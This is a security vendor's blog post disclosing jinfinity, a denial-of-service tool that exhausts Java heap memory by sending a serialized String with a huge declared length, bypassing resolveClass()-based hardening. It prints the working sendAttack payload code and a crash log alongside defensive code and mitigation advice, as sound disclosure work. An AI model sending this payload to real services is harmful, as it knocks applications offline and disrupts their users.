January 5, 2016

With all the talk about Java serialization vulnerabilities, I thought I'd share a new, open source tool I built for you to download and use, purposely designed to consume all the memory of a target that's deserializing objects -- eventually blowing it up. It’s called jinfinity. jinfinity exploits the fact that deserializers, like many parsers, follow very basic read-until-terminator patterns. jinfinity totally bypasses any of the protections discussed recently around untrusted deserialization.

The ObjectInputStream.java#readObject() code handles the deserializing of certain types, like null references, proxy classes and other stuff as special cases. One of these special cases is for Strings, and that's what we're interested in. In the Java HotSpot Virtual Machine (the most commonly used JVM), the code delegates String reading directly to a method called BlockDataInputStream#readUTF().

This is an important point: When deserializing most objects, the code calls ObjectInputStream#resolveClass() as part of the process. This method is where all the patches and hardening against recent exploits take place. Because that method is never involved in deserializing Strings, anyone can use this to attack an application that's "fully patched" against the recent spate of attacks.
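To make the bypass concrete, here is a minimal sketch. It assumes a hypothetical hardened stream, `DenyAllObjectInputStream`, that rejects every class in `resolveClass()`. That is far stricter than any real allow-list, and it is an illustration only, not code from jinfinity or from any actual patch. An `Integer` is rejected, but a `String` passes straight through because `resolveClass()` is never consulted for it.

```java
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.InputStream;
import java.io.InvalidClassException;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.io.ObjectStreamClass;

class ResolveClassBypassDemo {

    /** Hypothetical hardened stream: refuses to resolve any class at all. */
    static final class DenyAllObjectInputStream extends ObjectInputStream {
        DenyAllObjectInputStream(InputStream in) throws IOException {
            super(in);
        }

        @Override
        protected Class<?> resolveClass(ObjectStreamClass desc) throws IOException {
            throw new InvalidClassException(desc.getName(), "class not allowed");
        }
    }

    /** Serializes a single object with the standard ObjectOutputStream. */
    static byte[] serialize(Object o) throws IOException {
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        try (ObjectOutputStream oos = new ObjectOutputStream(bos)) {
            oos.writeObject(o);
        }
        return bos.toByteArray();
    }

    /** Returns the deserialized object, or null if resolveClass() rejected it. */
    static Object tryRead(byte[] data) throws IOException, ClassNotFoundException {
        try (ObjectInputStream ois =
                 new DenyAllObjectInputStream(new ByteArrayInputStream(data))) {
            return ois.readObject();
        } catch (InvalidClassException e) {
            return null;
        }
    }

    public static void main(String[] args) throws Exception {
        // The Integer needs a class descriptor, so resolveClass() blocks it.
        System.out.println("Integer: " + tryRead(serialize(Integer.valueOf(42))));
        // The String is read by the special-case path and is never checked.
        System.out.println("String:  " + tryRead(serialize("hello")));
    }
}
```

Any defense that lives only in `resolveClass()` has the same blind spot for String payloads.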

This is the part that should have us all concerned: It's absolutely nothing special. You just send what looks like a serialized object stream containing an absurdly large String. The maximum size of a Java String can be confusing. Because Strings are backed by char arrays, you can't have more than 2^31-1 characters, which is around 4GB at two bytes per char. It might be less if your heap is smaller than that. This contradicts the serialization spec, because you can specify a length of 2^63-1 in the protocol. The native HotSpot code does no validation on this value and will happily start trying to read a value greater than it could process. I suspect it uses the long type to support a future where enormous String values are possible.

Anyway, the way it handles creating the String makes it even worse. It uses a StringBuilder, which is probably the right tool for the job, but it uses it very inefficiently. A StringBuilder is backed by a character array, and as you append more stuff to it and surpass the size of the array, a new, bigger array is created and the old array is discarded. Each resize effectively doubles the memory cost of the input, until the old character array gets garbage collected.
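The resizing behavior is easy to observe. The sketch below is a small illustration, not the JDK's own code: it appends one character at a time and counts how often `capacity()` changes, first with a default-sized `StringBuilder` and then with one pre-sized to the final length. The helper name `countResizes` is made up for this example.

```java
class StringBuilderGrowthDemo {

    /** Appends n chars one at a time and counts how often the capacity changes. */
    static int countResizes(StringBuilder sb, int n) {
        int resizes = 0;
        int capacity = sb.capacity();
        for (int i = 0; i < n; i++) {
            sb.append('B');
            if (sb.capacity() != capacity) {
                // A capacity change means a new backing array was allocated
                // and the old contents were copied into it.
                capacity = sb.capacity();
                resizes++;
            }
        }
        return resizes;
    }

    public static void main(String[] args) {
        int n = 1_000_000;
        System.out.println("default capacity: "
                + countResizes(new StringBuilder(), n) + " resizes");
        System.out.println("pre-sized:        "
                + countResizes(new StringBuilder(n), n) + " resizes");
    }
}
```

The pre-sized builder never reallocates, while the default one reallocates repeatedly, and each reallocation briefly holds both the old and the new array on the heap.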

The lesson: if you're going to use a StringBuilder, initialize it to roughly the size you'll need so it doesn't have to keep resizing itself. Even though the code knows the expected size of the input, it doesn't attempt to initialize the StringBuilder to that size:

    private String readUTFBody(long utflen) throws IOException {
        StringBuilder sbuf = new StringBuilder();

You might be correct to be suspicious of the size value, because it's controlled by the user. But the code performs an unchecked read on the data until it blows up anyway, so we're already trusting the data. Why not try to initialize the StringBuilder to the size requested? If that initialize step fails, it was likely an attack requesting too much of the heap, and we should blow up right away! The alternative is what we have today: the heap is slowly and surely filled up, and then it blows up, after a lot of damage was already done.
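A fail-fast reader along those lines might look like the sketch below. It is a variation on the idea, not the JDK's code: it adds an explicit cap (`maxBytes`, an assumed application-level setting) rather than relying on the allocation itself to fail. The wire format here is also a simplification invented for the example: an 8-byte length followed by plain UTF-8 bytes, whereas real Java serialization uses modified UTF-8.

```java
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.DataInputStream;
import java.io.DataOutputStream;
import java.io.IOException;
import java.io.InvalidObjectException;
import java.nio.charset.StandardCharsets;

class BoundedStringReader {

    /** Reads a length-prefixed string, rejecting the declared length up front. */
    static String readBounded(DataInputStream in, int maxBytes) throws IOException {
        long declared = in.readLong();
        if (declared < 0 || declared > maxBytes) {
            // Fail immediately, before a single payload byte is buffered.
            throw new InvalidObjectException(
                    "declared length " + declared + " is outside 0.." + maxBytes);
        }
        // The length is now known to be small, so allocate exactly once.
        byte[] buf = new byte[(int) declared];
        in.readFully(buf); // throws EOFException if the sender lied and sent less
        return new String(buf, StandardCharsets.UTF_8);
    }

    /** Test helper: builds a frame with an arbitrary (possibly dishonest) length. */
    static byte[] frame(long declaredLength, String body) throws IOException {
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        DataOutputStream out = new DataOutputStream(bos);
        out.writeLong(declaredLength);
        out.write(body.getBytes(StandardCharsets.UTF_8));
        out.flush();
        return bos.toByteArray();
    }

    public static void main(String[] args) throws IOException {
        byte[] honest = frame(5, "hello");
        System.out.println(readBounded(
                new DataInputStream(new ByteArrayInputStream(honest)), 16));

        byte[] hostile = frame(Long.MAX_VALUE, "BBBB");
        try {
            readBounded(new DataInputStream(new ByteArrayInputStream(hostile)), 16);
        } catch (InvalidObjectException e) {
            System.out.println("rejected: " + e.getMessage());
        }
    }
}
```

The point of the design is ordering: the hostile frame is refused after reading eight bytes, instead of after the heap is already full.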

The important code for the attack looks like this:

    public void sendAttack(final OutputStream os, final long payloadSize) throws IOException {
        /*
         * Write the magic number to indicate this is a serialized Java Object
         * and the protocol version.
         */
        os.write(0xAC);
        os.write(0xED);
        os.write(0); // don't need the high bits set for the version
        os.write(STREAM_VERSION);

        /*
         * Tell them it's a String of a certain size.
         */
        if (payloadSize <= 0xFFFF) {
            os.write(TC_STRING);
            os.write((int) payloadSize >>> 8);
            os.write((int) payloadSize);
        } else {
            os.write(TC_LONGSTRING);
            os.write((int) (payloadSize >>> 56));
            os.write((int) (payloadSize >>> 48));
            os.write((int) (payloadSize >>> 40));
            os.write((int) (payloadSize >>> 32));
            os.write((int) (payloadSize >>> 24));
            os.write((int) (payloadSize >>> 16));
            os.write((int) (payloadSize >>> 8));
            os.write((int) (payloadSize >>> 0));
        }

        try {
            for (long i = 0; i < payloadSize; i++) {
                os.write((byte) 'B');
            }
        } catch (IOException e) {
            System.err.println("[!] Possible success. Couldn't communicate with host.");
        }
    }
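To see that the hand-written header matches what the JDK itself emits, the following sketch serializes a tiny String with the standard `ObjectOutputStream` and prints the bytes in hex. The class and method names are made up for this illustration.

```java
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.ObjectOutputStream;

class SerializedStringHeaderDemo {

    /** Serializes one object and returns its bytes as space-separated hex. */
    static String hexOfSerialized(Object o) throws IOException {
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        try (ObjectOutputStream oos = new ObjectOutputStream(bos)) {
            oos.writeObject(o);
        }
        StringBuilder hex = new StringBuilder();
        for (byte b : bos.toByteArray()) {
            hex.append(String.format("%02X ", b & 0xFF));
        }
        return hex.toString().trim();
    }

    public static void main(String[] args) throws IOException {
        // Layout: magic (AC ED), version (00 05), TC_STRING (74),
        // two-byte length (00 02), then the payload bytes (42 42).
        System.out.println(hexOfSerialized("BB"));
        // prints: AC ED 00 05 74 00 02 42 42
    }
}
```

The attack stream is the same layout with a dishonest length field and a payload that never ends.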



To prove this is trivially possible, I built a simple servlet, deployed on Jetty, which deserializes an object from an HTTP request. Here's what happens when I use jinfinity on it:

The heap fills up. Then, the app blows up:

    2015-11-24 21:51:25.732:WARN:oejs.ServletHandler:Error for /ds/read
    java.lang.OutOfMemoryError: Java heap space
        at java.lang.AbstractStringBuilder.expandCapacity(AbstractStringBuilder.java:99)
        at java.lang.AbstractStringBuilder.append(AbstractStringBuilder.java:518)
        at java.lang.StringBuffer.append(StringBuffer.java:307)
        at java.io.ObjectInputStream$BlockDataInputStream.readUTFSpan(ObjectInputStream.java:3044)
        at java.io.ObjectInputStream$BlockDataInputStream.readUTFBody(ObjectInputStream.java:2952)
        at java.io.ObjectInputStream$BlockDataInputStream.readLongUTF(ObjectInputStream.java:2935)
        at java.io.ObjectInputStream.readString(ObjectInputStream.java:1570)
        at java.io.ObjectInputStream.readObject0(ObjectInputStream.java:1295)
        at java.io.ObjectInputStream.readObject(ObjectInputStream.java:347)
        at com.contrastsecurity.jinfinity.demo.DemoServlet.doPost(MessageServlet.java:20)

An OutOfMemoryError is really, really bad. It's not just the parser code that suffers when this happens. Other threads, handling legitimate traffic or doing other legitimate work, can't create new objects. Things get really slow. Bizarre errors start occurring, and data becomes very screwed up. This is why many people try to change the behavior of the JVM to immediately terminate when this happens.

Even if you don't have deserializing code, you're probably vulnerable to something like this. Imagine you had a JSON endpoint on your server. The typical pattern would be to parse the JSON object received, query for the data you want, and blow up if you don't get it. Object deserialization follows the same pattern: coerce the input into a Java object, then blow up if it's not the type to which you tried to cast. In both of these scenarios, an attacker can provide an endless stream of data and never send the terminating characters necessary for the read to end.

In both the JSON and serialization scenarios, you don't have many common sense checks going on, like, "why are we deserializing 1,000 nested objects?" Or, "why does this JSON map have 1,000 keys?" Until we do, attacks like these will always work. We need to sandbox the process, somehow.

We took a shot at sandboxing the serialization process by size, object count, etc., but we're going to need to rethink these APIs from a defensive perspective.
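As a rough illustration of sandboxing by size, here is a minimal sketch of a byte-counting stream wrapper. It is not the implementation referred to above. `LimitedInputStream` and its limit are hypothetical names chosen for this example, and a real defense would also need to bound object counts and nesting depth.

```java
import java.io.ByteArrayInputStream;
import java.io.FilterInputStream;
import java.io.IOException;
import java.io.InputStream;

/** Hypothetical wrapper that aborts once more than maxBytes have been read. */
class LimitedInputStream extends FilterInputStream {
    private long remaining;

    LimitedInputStream(InputStream in, long maxBytes) {
        super(in);
        this.remaining = maxBytes;
    }

    @Override
    public int read() throws IOException {
        int b = super.read();
        if (b >= 0) {
            consume(1);
        }
        return b;
    }

    @Override
    public int read(byte[] buf, int off, int len) throws IOException {
        int n = super.read(buf, off, len);
        if (n > 0) {
            consume(n);
        }
        return n;
    }

    @Override
    public long skip(long n) throws IOException {
        long skipped = super.skip(n);
        if (skipped > 0) {
            consume(skipped);
        }
        return skipped;
    }

    /** Charges n bytes against the budget and fails once it is overdrawn. */
    private void consume(long n) throws IOException {
        remaining -= n;
        if (remaining < 0) {
            throw new IOException("input exceeded size limit");
        }
    }

    public static void main(String[] args) throws IOException {
        InputStream in = new LimitedInputStream(new ByteArrayInputStream(new byte[10]), 4);
        try {
            while (in.read() >= 0) {
                // keep reading until the limit trips
            }
        } catch (IOException e) {
            System.out.println("stopped: " + e.getMessage());
        }
    }
}
```

Wrapping the request body in something like this before handing it to `ObjectInputStream` or a JSON parser turns an unbounded read into an early `IOException`, at the cost of having to pick a sensible limit per endpoint.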

Why aren't we seeing this type of denial-of-service attack everywhere? Most likely because there's no need for the attackers to use this stuff yet. Attackers didn't need a return-to-libc attack until non-executable stacks became popular. Slow POST attacks still work, and consume less bandwidth. Network-based volumetric DDoS options are still available. There are too many other opportunities that don't require targeting these more obscure corners of our applications.

How lucky are we?

All the code and documentation on jinfinity, including a demo, is on our GitHub page.

Perhaps, all it takes is rethinking your existing program and moving to one that leverages a continuous application security (CAS) approach.

Organizations practicing CAS quickly determine how a new risk affects them, design a defense strategy, and measure their progress to 100% coverage. By implementing eight functions within an enterprise you can assemble an effective application security program.
